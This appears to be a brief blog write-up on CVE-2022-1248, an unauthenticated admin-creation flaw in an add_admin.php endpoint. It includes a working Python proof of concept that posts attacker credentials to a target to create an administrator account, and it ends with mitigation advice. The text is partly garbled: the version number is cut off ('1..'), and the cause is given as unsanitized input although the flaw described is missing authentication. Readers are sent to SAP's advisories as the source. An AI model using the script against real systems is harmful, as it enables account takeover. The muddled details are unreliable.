A recent discovery has unveiled a critical vulnerability in the SAP Information System 1.. By exploiting this vulnerability, an unauthenticated attacker could potentially create a new admin account with a simple POST request.

This security flaw affects the file /SAP_Information_System/controllers/add_admin.php and has since been assigned the CVE-ID CVE-2022-1248, designating it as a high-priority issue in the cybersecurity world.

Exploit Details

The vulnerability at the heart of this issue is due to an unsanitized input field in the "add_admin.php" file, which does not properly filter user input when creating a new administrator account. As a result, an attacker could potentially create and gain access to a new admin account without the need for authentication.

The following code snippet demonstrates how an attacker could exploit the CVE-2022-1248 vulnerability by crafting a POST request.

import requests

# Target URL and vulnerable endpoint
url = "http://TARGET_IP/SAP_Information_System/controllers/add_admin.php";

# The attacker's desired admin username and password
data = {
    "username": "attacker",
    "password": "P@$$wrd",
}

# Sending the POST request
response = requests.post(url, data=data)

if response.status_code == 200:
    print("Successfully created admin account.")
else:
    print("Failed to create admin account.")

For more information about this vulnerability, the original disclosure and references can be found at the following links:

1. SAP Security Advisory: https://www.sap.com/about/trust-center/security-advisories.html (Search for CVE-2022-1248)
2. National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2022-1248

Mitigation Steps

Until a patch is released, admins using SAP Information System 1. are advised to take the following precautions to prevent unauthorized account creation:

1. Limit access to the vulnerable "/SAP_Information_System/controllers/add_admin.php" file through network restrictions and firewall rules.
2. Regularly monitor logs and user access for any unusual activities or unauthorized new admin accounts.
3. Delete any admin accounts that were not created through internal processes and make sure to re-secure the system.

In conclusion, the CVE-2022-1248 vulnerability is a critical issue in SAP Information System 1. that all system administrators should be aware of, as it allows unauthenticated attackers to create and gain control of a new admin account with a simple POST request. It is imperative to monitor the references mentioned above for any updates, patch releases, and urgent notifications to maintain a secure IT environment.

Timeline

Published on: 04/06/2022 03:15:00 UTC
Last modified on: 04/13/2022 15:13:00 UTC